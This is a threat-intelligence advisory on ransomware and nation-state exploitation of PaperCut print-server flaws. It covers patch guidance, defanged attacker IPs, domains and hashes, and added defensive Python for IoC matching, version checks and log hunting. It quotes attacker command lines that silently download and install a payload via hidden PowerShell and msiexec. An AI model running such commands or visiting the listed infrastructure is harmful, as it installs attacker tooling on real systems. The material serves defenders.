Threat actors actively exploiting critical PaperCut server vulnerabilities

Update – PaperCut vulnerability targeted by ransomware gang – 12th May 2023

Updated Target Industry

Education sector.

Overview

A joint advisory was released by the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) regarding the Bl00dy ransomware gang targeting the education sector by leveraging the previously disclosed PaperCut vulnerability, tracked as CVE-2023-27350.

Updated Impact

The associated ransomware operations have allowed threat actors to encrypt and exfiltrate data from target systems.

Updated Containment, Mitigations & Remediations

The recent reporting indicates that some organisations, particularly in the education sector, have yet to apply the security updates which address CVE-2023-27350. As a reminder, it is strongly recommended that the PaperCut NG and MF update versions 20.1.7, 21.2.11, and 22.0.9 are applied as soon as possible.

Updated Indicators of Compromise (IoCs)

The following Indicators of Compromise were released within the CISA advisory:

Bl00dy ransomware gang associated email addresses:

– decrypt.support@privyonline[.]com

– fimaribahundqf@gmx[.]com

– main-office@data-highstream[.]com

– prepalkeinuc0u@gmx[.]com

– tpyrcne@onionmail[.]org

Bl00dy ransomware gang associated IP addresses:

– 102.130.112[.]157

– 172.106.112[.]46

– 176.97.76[.]163

– 192.160.102[.]164

– 194.87.82[.]7

– 195.123.246[.]20

– 198.50.191[.]95

– 206.197.244[.]75

– 216.122.175[.]114

– 46.4.20[.]30

– 5.188.206[.]14

– 5.8.18[.]233

– 5.8.18[.]240

– 80.94.95[.]103

– 89.105.216[.]106

– 92.118.36[.]199

Bl00dy ransomware gang associated domains:

– anydeskupdate[.]com

– anydeskupdates[.]com

– ber6vjyb[.]com

– netviewremote[.]com

– study.abroad[.]ge

– upd343.winserverupdates[.]com

– upd488.windowservicecemter[.]com

– upd488.windowservicecemter[.]com/download/update.dll

– updateservicecenter[.]com

– windowcsupdates[.]com

– windowservicecemter[.]com

– windowservicecentar[.]com

– windowservicecenter[.]com

– winserverupdates[.]com

Bl00dy ransomware gang associated command lines:

– cmd /c "powershell.exe -nop -w hidden Invoke-WebRequest '<url>/setup.msi' -OutFile 'setup.msi'"

– cmd /c "msiexec /i setup.msi /qn IntegratorLogin=<email_address> CompanyId=1"

Bl00dy ransomware gang associated file hashes (SHA256):

– 6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15

– c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125

– 0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f
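The indicators above are published defanged (with `[.]` in place of `.`), so they cannot be matched against real proxy, DNS or EDR logs as printed. The following added example, which is not code from Quorum Cyber, CISA or PaperCut, refangs the bulletin's domains, IP addresses and SHA256 hashes and scans log lines for them, treating any subdomain of a listed domain as a hit and preferring the most specific listed entry. The log lines are constructed for illustration and their format is an assumption.

```python
"""Refang the defanged Bl00dy ransomware IoCs listed in the bulletin and match
them against log lines. Added example, not code from Quorum Cyber, CISA or
PaperCut; the log lines at the bottom are constructed for illustration."""
import re

# Indicators copied from the bulletin, in the defanged form CISA published.
# The URL entry upd488.windowservicecemter[.]com/download/update.dll is
# covered by its host name below.
DEFANGED_DOMAINS = [
    "anydeskupdate[.]com", "anydeskupdates[.]com", "ber6vjyb[.]com",
    "netviewremote[.]com", "study.abroad[.]ge",
    "upd343.winserverupdates[.]com", "upd488.windowservicecemter[.]com",
    "updateservicecenter[.]com", "windowcsupdates[.]com",
    "windowservicecemter[.]com", "windowservicecentar[.]com",
    "windowservicecenter[.]com", "winserverupdates[.]com",
]
DEFANGED_IPS = [
    "102.130.112[.]157", "172.106.112[.]46", "176.97.76[.]163",
    "192.160.102[.]164", "194.87.82[.]7", "195.123.246[.]20",
    "198.50.191[.]95", "206.197.244[.]75", "216.122.175[.]114",
    "46.4.20[.]30", "5.188.206[.]14", "5.8.18[.]233", "5.8.18[.]240",
    "80.94.95[.]103", "89.105.216[.]106", "92.118.36[.]199",
]
SHA256_HASHES = {
    "6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15",
    "c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125",
    "0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f",
}


def refang(indicator: str) -> str:
    """Convert the published defanged form into a value that matches real logs."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").strip().lower()


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IPS = {refang(i) for i in DEFANGED_IPS}

# Token extractors: dotted-quad IPs, host names ending in an alphabetic TLD,
# and 64-hex-character SHA256 digests.
IP_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
HOST_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)
SHA_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def domain_hit(host: str):
    """Return the listed domain that host equals or is a subdomain of,
    preferring the most specific listed entry; None if no match."""
    host = host.lower()
    matches = [d for d in DOMAINS if host == d or host.endswith("." + d)]
    return max(matches, key=len) if matches else None


def scan_line(line: str):
    """Return (kind, indicator) pairs for every listed IoC found in one line."""
    hits = []
    for m in IP_RE.finditer(line):
        if m.group(1) in IPS:
            hits.append(("ip", m.group(1)))
    for m in HOST_RE.finditer(line):
        d = domain_hit(m.group(1))
        if d:
            hits.append(("domain", d))
    for m in SHA_RE.finditer(line):
        if m.group(0).lower() in SHA256_HASHES:
            hits.append(("sha256", m.group(0).lower()))
    return hits


def scan(lines):
    """Return [(line_index, hits)] for every line containing at least one IoC."""
    results = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample log lines (not real telemetry); format is an assumption.
LOG_LINES = [
    "2023-04-13T10:02:11Z proxy src=10.0.5.23 dst=5.8.18.233 host=upd488.windowservicecemter.com url=/download/update.dll action=allow",
    "2023-04-13T10:02:12Z dns client=10.0.5.23 query=anydeskupdates.com type=A",
    "2023-04-13T10:05:40Z edr host=PRINT01 file=C:\\Windows\\Temp\\setup.msi sha256=c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125",
    "2023-04-13T10:06:00Z proxy src=10.0.5.40 dst=142.250.72.46 host=www.google.com url=/ action=allow",
]

if __name__ == "__main__":
    for idx, hits in scan(LOG_LINES):
        print(idx, hits)
```

Matching the hashes only works where the log source records file digests (an EDR or file-integrity feed); the proxy and DNS lines only yield domain and IP hits. The subdomain rule matters here because the advisory lists both `windowservicecemter[.]com` and a specific `upd488` host under it.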

Updated Threat Group

As well as the Bl00dy ransomware gang, the Iranian nation-state sponsored advanced persistent threat (APT) group, tracked as Mango Sandstorm (also known as MuddyWater), has also been reported to have leveraged CVE-2023-27350 to execute remote code on target systems.

Updated Further Information

CISA Advisory

Update – PaperCut attacks attributed to Clop and LockBit ransomware operators – 26th April 2023

Overview

Microsoft has attributed the recent PaperCut server attacks to Clop and LockBit ransomware operations. The related campaigns pertain to the two PaperCut vulnerabilities, tracked as CVE-2023-27350 / ZDI-CAN-18987 / PO-1216 and CVE-2023-27351 / ZDI-CAN-19226 / PO-1219, that were disclosed earlier this month. The ransomware groups have exploited these vulnerabilities to harvest data from vulnerable PaperCut servers, starting on 13th April 2023.

Updated Threat Group

Microsoft declared that the threat group behind the Clop and LockBit ransomware operations exploiting the PaperCut vulnerabilities is being tracked as Lace Tempest, the activity of which correlates to that of the FIN11 and TA505 threat actor groups.

Updated Threat Landscape

Vulnerable PaperCut server exploitation fits the attack profile of the Clop ransomware group. The ransomware group has explicitly stated that they prefer to harvest data to extort their victims. Such a method was recently observed with the threat actor group exploiting zero-day vulnerabilities in the GoAnywhere MFT platform to harvest corporate data.

Given that PaperCut servers contain features that allow print jobs and their associated documents to be saved, they are a prime target for threat actors seeking opportunities for data exfiltration.

Updated Further Information

Vulnera article

Update – Potential Russian threat actor involvement in PaperCut vulnerability exploitation – 24th April 2023 

Overview 

The recently disclosed PaperCut server vulnerability, tracked as CVE-2023-27350 (CVSS score – 9.8: Critical), has been added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) Catalog due to evidence of active exploitation. On exposed servers, PowerShell commands have been observed being spawned by the PaperCut software to install remote management and maintenance (RMM) software, for the purpose of persistence and code execution on target hosts.

Updated Indicators of Compromise 

File hashes (SHA256): 

– f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb 

– c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125 

Domains: 

– upd488[.]windowservicecemter[.]com/download/ld.txt 

– upd488[.]windowservicecemter[.]com/download/AppPrint.msi 

– upd488[.]windowservicecemter[.]com/download/a2.msi 

– upd488[.]windowservicecemter[.]com/download/a3.msi 

– anydeskupdate[.]com 

– anydeskupdates[.]com 

– netviewremote[.]com 

– updateservicecenter[.]com 

– windowcsupdates[.]com 

– windowservicecentar[.]com 

– windowservicecenter[.]com 

– winserverupdates[.]com 

Updated Threat Actor 

A list of Indicators of Compromise has been released, analysis of which revealed that one of the domains (windowservicecemter[.]com) also hosts the TrueBot malware variant. It should be noted, however, that at the time of disclosure the software developer stated that no TrueBot malware deployment had been detected.

Connections exist between TrueBot malware and Evil Corp, through its threat group cluster "TA505", which has previously distributed Clop ransomware. However, at the time of writing, it should be noted that whilst there is a realistic possibility that such an attribution could be made, this remains in the realm of speculation.

Please refer to the Clop ransomware report in the "Malware Reports" section of the threat intelligence page on the Quorum Cyber website for further details.

Updated Threat Landscape 

The objective of the current PaperCut exploitation campaign remains unknown. However, the potential link to second-stage ransomware distribution should be highlighted as a concern.  

Updated Further Information 

PaperCut Advisory

CISA Known Exploited Vulnerabilities Catalog

Target Industry

Indiscriminate, opportunistic targeting.

Overview

PaperCut has disclosed that threat actors are actively exploiting two security vulnerabilities to gain access to vulnerable servers. The first is tracked as ZDI-CAN-18987 / PO-1216 (CVSS v3.1 score: 9.8 – critical) and pertains to an unauthenticated remote code execution flaw for both application and site servers. The second, tracked as ZDI-CAN-19226 / PO-1219 (CVSS v3.1 score: 8.2 – high), relates to an unauthenticated information disclosure flaw on all OS platforms for application servers.

The software developer announced that both vulnerabilities have been detected as being actively exploited in the wild by cyber threat actors.

Impact

– Successful exploitation of ZDI-CAN-18987 / PO-1216 would allow an unauthenticated threat actor to attain remote code execution (RCE) on a PaperCut application server, without needing to log in.
– Successful exploitation of ZDI-CAN-19226 / PO-1219 would allow an unauthenticated threat actor to retrieve data about users stored within PaperCut MF or NG, including usernames, full names, email addresses, office/department information and any card numbers associated with the user. The threat actor could also retrieve hashed passwords, but only for internally created PaperCut users.

Vulnerability Detection

PaperCut has released patches for these vulnerabilities in the respective product versions listed below. Earlier versions remain vulnerable to exploitation.

Affected Products

– ZDI-CAN-18987 / PO-1216: All PaperCut MF or NG versions 8.0 or later on all OS platforms, for both application and site servers.
– ZDI-CAN-19226 / PO-1219: All PaperCut MF or NG versions 15.0 or later on all OS platforms for application servers.

Containment, Mitigations & Remediations

It is strongly recommended that PaperCut users upgrade to PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, or 22.0.9 and later.

It should be noted that software versions prior to version 19 have reached end of life (EoL) and are no longer supported, so no security updates will be released for them. In such cases, it is recommended that organisations purchase an updated licence if possible.
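Because the fixed build differs per release branch and older branches are out of support, deciding whether a given installation is covered by the update is more than a single comparison. The following added example (not PaperCut's or Quorum Cyber's code) encodes the fixed versions, the "8.0 or later is affected" scope and the "prior to 19 is EoL" rule from this bulletin; mapping a version to its branch by major number, and treating releases newer than 22.0.9 as patched, are assumptions made here.

```python
"""Classify a PaperCut NG/MF version string against the fixed releases named in
the bulletin. Added example, not PaperCut's or Quorum Cyber's code. Branch
mapping by major version and 'newer than 22.0.9 is patched' are assumptions."""
from typing import Tuple

FIXED = {20: (20, 1, 7), 21: (21, 2, 11), 22: (22, 0, 9)}  # from the bulletin
FIRST_AFFECTED = (8, 0, 0)   # ZDI-CAN-18987 affects versions 8.0 or later
EOL_BEFORE = 19              # versions prior to 19 are end of life, no fix coming


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '21.2' or '22.0.9' into a comparable tuple, padded to three parts."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts + (0,) * (3 - len(parts))


def assess(version: str) -> str:
    """Return one of: not-affected, vulnerable-eol, vulnerable, patched."""
    v = parse_version(version)
    if v < FIRST_AFFECTED:
        return "not-affected"          # below the first affected release
    if v[0] < EOL_BEFORE:
        return "vulnerable-eol"        # unsupported: upgrade/new licence needed
    fix = FIXED.get(v[0])
    if fix is None:
        # Branch not named in the bulletin: 19.x has no fix listed, so it stays
        # vulnerable; anything newer than the newest fix is assumed patched.
        return "patched" if v > max(FIXED.values()) else "vulnerable"
    return "patched" if v >= fix else "vulnerable"


if __name__ == "__main__":
    for sample in ("18.3.2", "19.2.3", "21.1.5", "21.2.11", "22.0.8", "22.0.9"):
        print(sample, assess(sample))
```

Feed it the version reported by each server's About page or inventory record; anything other than `patched` should be scheduled for upgrade, and `vulnerable-eol` hosts cannot be fixed by patching alone.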

No workarounds are currently available for ZDI-CAN-18987 / PO-1216. However, ZDI-CAN-19226 / PO-1219 can be mitigated by applying the "Allow list" restriction, as follows:

– Navigate to "Options" > "Advanced" > "Security" > "Allowed site server IP addresses".

– Set this option so that only the IP addresses of verified site servers are allowed to connect.

Indicators of Compromise

At the time of writing, there is no definitive method to determine whether a vulnerable PaperCut product has been compromised. However, PaperCut has set out a recommended series of steps that administrators can follow to investigate potential compromise:

– Search for suspicious activity in Logs > Application Log, within the PaperCut admin interface
– Remain vigilant for any updates from a user named “setup wizard”
– Search for new users being created or other configuration keys being tampered with
– If the application server logs are in debug mode, search for any instances mentioning “SetupCompleted” at a timestamp not correlating with the server installation or upgrade.
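The four checks above can be run mechanically over an exported application log rather than by eye. The following added example (not PaperCut's or Quorum Cyber's tooling) flags activity by a user named "setup wizard", any "SetupCompleted" entry that does not fall within a known install or upgrade window, and user-creation events. The log line format, the one-hour tolerance around a known setup event and the sample lines are all constructed for illustration and are not PaperCut's real log format.

```python
"""Hunt a PaperCut application log for the traces the bulletin names. Added
example, not PaperCut's or Quorum Cyber's tooling. The line format below is a
constructed stand-in for the real application log, not PaperCut's format."""
import re
from datetime import datetime, timedelta

# Constructed sample log: "<timestamp> <level> [<user>] <message>"
APP_LOG = """\
2023-03-02 09:15:02 INFO  [admin] Server upgrade complete
2023-03-02 09:15:03 DEBUG [system] SetupCompleted
2023-04-13 02:41:18 INFO  [setup wizard] Config key 'example.key.one' updated
2023-04-13 02:41:19 INFO  [setup wizard] Config key 'example.key.two' updated
2023-04-13 02:41:25 DEBUG [system] SetupCompleted
2023-04-13 02:42:01 INFO  [setup wizard] New admin user 'svc-backup' created
2023-04-14 08:00:00 INFO  [admin] User 'jsmith' password changed
"""

# When the server was legitimately installed or upgraded, taken from change
# records. Constructed value for the sample above.
KNOWN_SETUP_EVENTS = [datetime(2023, 3, 2, 9, 15, 0)]
WINDOW = timedelta(hours=1)  # tolerance around a known setup event (assumption)

LINE_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\w+)\s+\[([^\]]+)\] (.*)$")
USER_CREATED_RE = re.compile(r"\bnew\b.*\buser\b|\buser\b.*\bcreated\b", re.I)


def parse(line: str):
    """Split one log line into its fields; None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            "level": m.group(2), "user": m.group(3), "msg": m.group(4),
            "raw": line}


def near_known_setup(ts: datetime, known_events) -> bool:
    """True if ts lies within WINDOW of a recorded install or upgrade."""
    return any(abs(ts - k) <= WINDOW for k in known_events)


def hunt(lines, known_events):
    """Return (reason, raw_line) findings in log order."""
    findings = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        outside = not near_known_setup(ev["ts"], known_events)
        # "setup wizard" should only act during a real install or upgrade
        if ev["user"].lower() == "setup wizard" and outside:
            findings.append(("setup-wizard-activity", ev["raw"]))
        # SetupCompleted at a time not matching an install or upgrade
        if "SetupCompleted" in ev["msg"] and outside:
            findings.append(("setupcompleted-outside-window", ev["raw"]))
        # New accounts are worth a manual check regardless of timing
        if USER_CREATED_RE.search(ev["msg"]):
            findings.append(("user-created", ev["raw"]))
    return findings


if __name__ == "__main__":
    for reason, raw in hunt(APP_LOG.splitlines(), KNOWN_SETUP_EVENTS):
        print(f"{reason:32} {raw}")
```

The SetupCompleted check only works if the server was logging at debug level at the time, as the bulletin notes, and an absence of findings is not proof of a clean host since an intruder may have pruned the log; the rebuild guidance that follows still applies where compromise is suspected.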

It must be emphasised that while the steps mentioned above could reveal malicious activity, threat actors may have removed traces of their operations from the associated logs. As such, administrators who suspect server compromise are advised to follow the steps below:

– Create back-ups
– Wipe the application server
– Rebuild the configuration from a safe back-up point.

Threat Landscape

PaperCut develops print management software compatible with all major platforms. It is used by state organisations and education institutes, and the software developer provides services to hundreds of millions of customers in over 100 countries, holding a significant proportion of the print management market share. Given that threat actors generally weigh probability of success against asset value when deciding which attack surfaces to focus on, PaperCut products could emerge as a consistent target. Because PaperCut products have become an integral part of business operations, threat actors will continue to exploit vulnerabilities in them in an attempt to extract the sensitive data they hold.

Threat Group

No attribution to specific threat actors or groups has been identified at the time of this writing.

Mitre Methodologies

Tactic:
TA0002 – Execution

Execution Technique:
T1210 – Exploitation of Remote Services

Tactic:
TA0006 – Credential Access

Credential Access Technique:
T1003 – OS Credential Dumping

Further Information

PaperCut Advisory